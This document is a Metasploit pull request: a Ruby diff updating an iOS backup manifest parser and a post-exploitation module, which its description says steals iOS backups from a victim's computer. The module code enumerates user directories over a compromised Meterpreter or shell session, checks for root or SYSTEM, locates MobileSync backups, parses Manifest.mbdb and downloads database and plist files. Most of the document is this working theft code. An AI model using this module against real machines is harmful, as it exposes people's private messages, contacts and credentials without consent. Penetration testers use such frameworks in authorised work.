### PR TITLE
updated apple_ios_backup to support iOS 5 & iOS 6 backups

### DIFF
--- a/lib/rex/parser/apple_backup_manifestdb.rb
+++ b/lib/rex/parser/apple_backup_manifestdb.rb
@@ -1,93 +1,67 @@
-# -*- coding: binary -*-
 #
 # This is a Ruby port of the Python manifest parsing code posted to:
 # 	http://stackoverflow.com/questions/3085153/how-to-parse-the-manifest-mbdb-file-in-an-ios-4-0-itunes-backup/3130860#3130860
 #
+# The script is updated to support iOS 5 & iOS 6 backups : by Satish B (satishb3) - www.securitylearn.net
+# Reference: http://code.google.com/p/iphone-dataprotection/source/browse/python_scripts/backups/backup4.py
+#
 
+require 'digest/sha1'
 module Rex
 module Parser
 class AppleBackupManifestDB
 
 	attr_accessor :entry_offsets
 	attr_accessor :entries
-	attr_accessor :mbdb, :mbdx
-	attr_accessor :mbdb_data, :mbdx_data
-	attr_accessor :mbdb_offset, :mbdx_offset
+	attr_accessor :mbdb
+	attr_accessor :mbdb_data
+	attr_accessor :mbdb_offset
+	
+	def initialize(mbdb_data)	
 
-	def initialize(mbdb_data, mbdx_data)
 		self.entries = {}
 		self.entry_offsets = {}
 		self.mbdb_data = mbdb_data
-		self.mbdx_data = mbdx_data
 		parse_mbdb
-		parse_mbdx
+		
 	end
-
-	def self.from_files(mbdb_file, mbdx_file)
-		mbdb_data = ""
-		::File.open(mbdb_file, "rb") {|fd| mbdb_data = fd.read(fd.stat.size) }
-		mbdx_data = ""
-		::File.open(mbdx_file, "rb") {|fd| mbdx_data = fd.read(fd.stat.size) }
-
-		self.new(mbdb_data, mbdx_data)
-	end
-
+		
 	def parse_mbdb
-		raise ArgumentError, "Not valid MBDB data" if self.mbdb_data[0,4] != "mbdb"
-		self.mbdb_offset = 4
-		self.mbdb_offset = self.mbdb_offset + 2 # Maps to \x05 \x00 (unknown)
+		raise ArgumentError, "Not valid MBDB data" if self.mbdb_data[0,6] != "mbdb\x05\x00"	
+		self.mbdb_offset = 6
 
 		while self.mbdb_offset < self.mbdb_data.length
-			info = {}
-			info[:start_offset] = self.mbdb_offset
-			info[:domain]       = mbdb_read_string
-			info[:filename]     = mbdb_read_string
-			info[:linktarget]   = mbdb_read_string
-			info[:datahash]     = mbdb_read_string
-			info[:unknown1]     = mbdb_read_string
-			info[:mode]         = mbdb_read_int(2)
-			info[:unknown2]     = mbdb_read_int(4)
-			info[:unknown3]     = mbdb_read_int(4)
-			info[:uid]          = mbdb_read_int(4)
-			info[:gid]          = mbdb_read_int(4)
-			info[:mtime]        = Time.at(mbdb_read_int(4))
-			info[:atime]        = Time.at(mbdb_read_int(4))
-			info[:ctime]        = Time.at(mbdb_read_int(4))
-			info[:length]       = mbdb_read_int(8)
-			info[:flag]         = mbdb_read_int(1)
-			property_count      = mbdb_read_int(1)
-			info[:properties]   = {}
+			info 			 = {}
+			info[:domain]      	 = mbdb_read_string
+			info[:filename]    	 = mbdb_read_string		
+			info[:linktarget]  	 = mbdb_read_string			
+			info[:datahash]    	 = mbdb_read_string
+			info[:encryptionkey]     = mbdb_read_string
+			info[:mode]         	 = mbdb_read_int(2)
+			info[:inodenumber]       = mbdb_read_int(8)			
+			info[:uid]        	 = mbdb_read_int(4)				
+			info[:gid]          	 = mbdb_read_int(4)				
+			info[:mtime]        	 = Time.at(mbdb_read_int(4))
+			info[:atime]        	 = Time.at(mbdb_read_int(4))
+			info[:ctime]       	 = Time.at(mbdb_read_int(4))
+			info[:length]       	 = mbdb_read_int(8)	
+			info[:protectionClass]   = mbdb_read_int(1)
+			property_count      	 = mbdb_read_int(1)
+			info[:properties]   	 = {}
 			1.upto(property_count) do |i|
 				k = mbdb_read_string
 				v = mbdb_read_string
 				info[:properties][k] = v
 			end
-			self.entry_offsets[ info[:start_offset] ] = info
+
+			filepath=info[:domain]+'-'+info[:filename]
+			info[:fname]=Digest::SHA1.hexdigest filepath
+			self.entry_offsets[ info[:fname] ] = info
 		end
+
 		self.mbdb_data = ""
 	end
-
-	def parse_mbdx
-		raise ArgumentError, "Not a valid MBDX file" if self.mbdx_data[0,4] != "mbdx"
-
-		self.mbdx_offset = 4
-		self.mbdx_offset = self.mbdx_offset + 2 # Maps to \x02 \x00 (unknown)
-
-		file_count = mbdx_read_int(4)
-
-		while self.mbdx_offset < self.mbdx_data.length
-			file_id = self.mbdx_data[self.mbdx_offset, 20].unpack("C*").map{|c| "%02x" % c}.join
-			self.mbdx_offset += 20
-			entry_offset = mbdx_read_int(4) + 6
-			mode = mbdx_read_int(2)
-			entry = entry_offsets[ entry_offset ]
-			# May be corrupted if there is no matching entry, but what to do about it?
-			next if not entry
-			self.entries[file_id] = entry.merge({:mbdx_mode => mode, :file_id => file_id})
-		end
-		self.mbdx_data = ""
-	end
-
+    	
 	def mbdb_read_string
 		raise RuntimeError, "Corrupted MBDB file" if self.mbdb_offset > self.mbdb_data.length
 		len = self.mbdb_data[self.mbdb_offset, 2].unpack("n")[0]
@@ -97,36 +71,17 @@ class AppleBackupManifestDB
 		self.mbdb_offset += len
 		return val
 	end
-
+	
 	def mbdb_read_int(size)
 		val = 0
 		size.downto(1) do |i|
 			val = (val << 8) + self.mbdb_data[self.mbdb_offset, 1].unpack("C")[0]
 			self.mbdb_offset += 1
 		end
-		val
-	end
-
-	def mbdx_read_string
-		raise RuntimeError, "Corrupted MBDX file" if self.mbdx_offset > self.mbdx_data.length
-		len = self.mbdx_data[self.mbdx_offset, 2].unpack("n")[0]
-		self.mbdx_offset += 2
-		return '' if len == 65535
-		val = self.mbdx_data[self.mbdx_offset, len]
-		self.mbdx_offset += len
-		return val
-	end
-
-	def mbdx_read_int(size)
-		val = 0
-		size.downto(1) do |i|
-			val = (val << 8) + self.mbdx_data[self.mbdx_offset, 1].unpack("C")[0]
-			self.mbdx_offset += 1
-		end
  		val
 	end
+	
 end
-
 
 end
 end

--- a/modules/post/multi/gather/apple_ios_backup.rb
+++ b/modules/post/multi/gather/apple_ios_backup.rb
@@ -1,12 +1,14 @@
 ##
-# $Id$
+# $Id: apple_ios_backup.rb 14175 2011-11-06 22:02:26Z sinn3r $
 ##
 
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+#
+# The script is updated to support iOS 5 and iOS 6 backups : by Satish B (@satishb3) - www.securitylearn.net
 ##
 
 require 'msf/core'
@@ -25,11 +27,12 @@ class Metasploit3 < Msf::Post
 			'Author'         =>
 				[
 					'hdm',
+					'Satishb3',#http://www.securitylearn.net
 					'bannedit' # Based on bannedit's pidgin_cred module structure
 				],
-			'Version'        => '$Revision$',
-			'Platform'       => ['windows', 'osx'],
-			'SessionTypes'   => ['meterpreter', 'shell']
+			'Version'        => '$Revision: 14175 $',
+			'Platform'       => ['windows'],
+			'SessionTypes'   => ['meterpreter' ]
 		))
 		register_options(
 			[
@@ -80,109 +83,18 @@ class Metasploit3 < Msf::Post
 		process_backups(paths)
 	end
 
-	def enum_users_unix
-		if @platform == :osx
-			home = "/Users/"
-		else
-			home = "/home/"
-		end
-
-		if got_root?
-			userdirs = []
-			session.shell_command("ls #{home}").gsub(/\s/, "\n").split("\n").each do |user_name|
-				userdirs << home + user_name
-			end
-			userdirs << "/root"
-		else
-			userdirs = [ home + whoami ]
-		end
-
-		backup_paths = []
-		userdirs.each do |user_dir|
-			output = session.shell_command("ls #{user_dir}/Library/Application\\ Support/MobileSync/Backup/")
-			if output =~ /No such file/i
-				next
-			else
-				print_status("Found backup directory in: #{user_dir}")
-				backup_paths << "#{user_dir}/Library/Application\\ Support/MobileSync/Backup/"
-			end
-		end
-
-		check_for_backups_unix(backup_paths)
-	end
-
-	def check_for_backups_unix(backup_dirs)
-		dirs = []
-		backup_dirs.each do |backup_dir|
-			print_status("Checking for backups in #{backup_dir}")
-			session.shell_command("ls #{backup_dir}").each_line do |dir|
-				next if dir == "." || dir == ".."
-				if dir =~ /^[0-9a-f]{16}/i
-					print_status("Found #{backup_dir}\\#{dir}")
-					dirs << ::File.join(backup_dir.chomp, dir.chomp)
-				end
-			end
-		end
-		dirs
-	end
-
-	def enum_users_windows
-		paths = Array.new
-
-		if got_root?
-			begin
-				session.fs.dir.foreach(@users) do |path|
-					next if path =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/i
-					bdir = "#{@users}\\#{path}#{@appdata}\\Apple Computer\\MobileSync\\Backup"
-					dirs = check_for_backups_win(bdir)
-					dirs.each { |dir| paths << dir } if dirs
-				end
-			rescue ::Rex::Post::Meterpreter::RequestError
-				# Handle the case of the @users base directory is not accessible
-			end
-		else
-			print_status "Only checking #{whoami} account since we do not have SYSTEM..."
-			path = "#{@users}\\#{whoami}#{@appdata}\\Apple Computer\\MobileSync\\Backup"
-			dirs = check_for_backups_win(path)
-			dirs.each { |dir| paths << dir } if dirs
-		end
-		return paths
-	end
-
-	def check_for_backups_win(bdir)
-		dirs = []
-		begin
-				print_status("Checking for backups in #{bdir}")
-				session.fs.dir.foreach(bdir) do |dir|
-				if dir =~ /^[0-9a-f]{16}/i
-					print_status("Found #{bdir}\\#{dir}")
-					dirs << "#{bdir}\\#{dir}"
-				end
-			end
-		rescue Rex::Post::Meterpreter::RequestError
-			# Handle base directories that do not exist
-		end
-		dirs
-	end
-
 	def process_backups(paths)
 		paths.each {|path| process_backup(path) }
 	end
 
 	def process_backup(path)
-
 		print_status("Pulling data from #{path}...")
 
 		mbdb_data = ""
-		mbdx_data = ""
-
+		
 		print_status("Reading Manifest.mbdb from #{path}...")
 		if session.type == "shell"
 			mbdb_data = session.shell_command("cat #{path}/Manifest.mbdb")
-			if mbdb_data =~ /No such file/i
-				print_status("Manifest.mbdb not found in #{path}...")
-				return
-			end
 		else
 			mfd = session.fs.file.new("#{path}\\Manifest.mbdb", "rb")
 			until mfd.eof?
@@ -191,23 +103,7 @@ class Metasploit3 < Msf::Post
 			mfd.close
 		end
 
-		print_status("Reading Manifest.mbdx from #{path}...")
-		if session.type == "shell"
-			mbdx_data = session.shell_command("cat #{path}/Manifest.mbdx")
-			if mbdx_data =~ /No such file/i
-				print_status("Manifest.mbdx not found in #{path}...")
-				return
-			end
-		else
-			mfd = session.fs.file.new("#{path}\\Manifest.mbdx", "rb")
-			until mfd.eof?
-				mbdx_data << mfd.read
-			end
-			mfd.close
-		end
-
-		manifest = Rex::Parser::AppleBackupManifestDB.new(mbdb_data, mbdx_data)
-
+		manifest = Rex::Parser::AppleBackupManifestDB.new(mbdb_data)
 		patterns = []
 		patterns << /\.db$/i if datastore['DATABASES']
 		patterns << /\.plist$/i if datastore['PLISTS']
@@ -216,14 +112,13 @@ class Metasploit3 < Msf::Post
 
 		done = {}
 		patterns.each do |pat|
-			manifest.entries.each_pair do |fname, info|
+			manifest.entry_offsets.each_pair do |fname,info|
 				next if done[fname]
 				next if not info[:filename].to_s =~ pat
 
 				print_status("Downloading #{info[:domain]} #{info[:filename]}...")
 
 				begin
-
 				fdata = ""
 				if session.type == "shell"
 					fdata = session.shell_command("cat #{path}/#{fname}")
@@ -252,6 +147,63 @@ class Metasploit3 < Msf::Post
 		end
 	end
 
+	def enum_users_unix
+		if @platform == :osx
+			home = "/Users/"
+		else
+			home = "/home/"
+		end
+
+		if got_root?
+			userdirs = session.shell_command("ls #{home}").gsub(/\s/, "\n")
+			userdirs << "/root\n"
+		else
+			userdirs = session.shell_command("ls #{home}#{whoami}/Library/Application\\ Support/MobileSync/Backup/")
+			if userdirs =~ /No such file/i
+				return
+			else
+				print_status("Found backup directory for: #{whoami}")
+				return ["#{home}#{whoami}/Library/Application\\ Support/MobileSync/Backup/"]
+			end
+		end
+
+		paths = Array.new
+		userdirs.each_line do |dir|
+			dir.chomp!
+			next if dir == "." || dir == ".."
+
+			dir = "#{home}#{dir}" if dir !~ /root/
+			print_status("Checking for backup directory in: #{dir}")
+
+			stat = session.shell_command("ls #{dir}/Library/Application\\ Support/MobileSync/Backup/")
+			next if stat =~ /No such file/i
+			paths << "#{dir}/Library/Application\\ Support/MobileSync/Backup/"
+		end
+		return paths
+	end
+
+	def enum_users_windows
+		paths = Array.new
+
+		if got_root?
+			begin
+				session.fs.dir.foreach(@users) do |path|
+					next if path =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/i
+					bdir = "#{@users}\\#{path}#{@appdata}\\Apple Computer\\MobileSync\\Backup"
+					dirs = check_for_backups_win(bdir)
+					dirs.each { |dir| paths << dir } if dirs
+				end
+			rescue ::Rex::Post::Meterpreter::RequestError
+				# Handle the case of the @users base directory is not accessible
+			end
+		else
+			print_status "Only checking #{whoami} account since we do not have SYSTEM..."
+			path = "#{@users}\\#{whoami}#{@appdata}\\Apple Computer\\MobileSync\\Backup"
+			dirs = check_for_backups_win(path)
+			dirs.each { |dir| paths << dir } if dirs
+		end
+		return paths
+	end
 
 	def got_root?
 		case @platform
@@ -271,6 +223,23 @@ class Metasploit3 < Msf::Post
 		end
 	end
 
+
+	def check_for_backups_win(bdir)
+		dirs = []
+		begin
+				print_status("Checking for backups in #{bdir}")
+				session.fs.dir.foreach(bdir) do |dir|
+				if dir =~ /^[0-9a-f]{16}/i
+					print_status("Found #{bdir}\\#{dir}")
+					dirs << "#{bdir}\\#{dir}"
+				end
+			end
+		rescue Rex::Post::Meterpreter::RequestError
+			# Handle base directories that do not exist
+		end
+		dirs
+	end
+
 	def whoami
 		if @platform == :windows
 			session.fs.file.expand_path("%USERNAME%")
@@ -278,4 +247,5 @@ class Metasploit3 < Msf::Post
 			session.shell_command("whoami").chomp
 		end
 	end
+
 end


### PR DESCRIPTION
Apple iOS Backup File Extraction module - is a post exploitation module to steal apple iOS backups from victims computer. The module is updated to support iOS 5 and iOS 6 backups.

Resubmitting the pull request without replacing all the newlines with CRLFs. If it does not work, let me know how to do that.
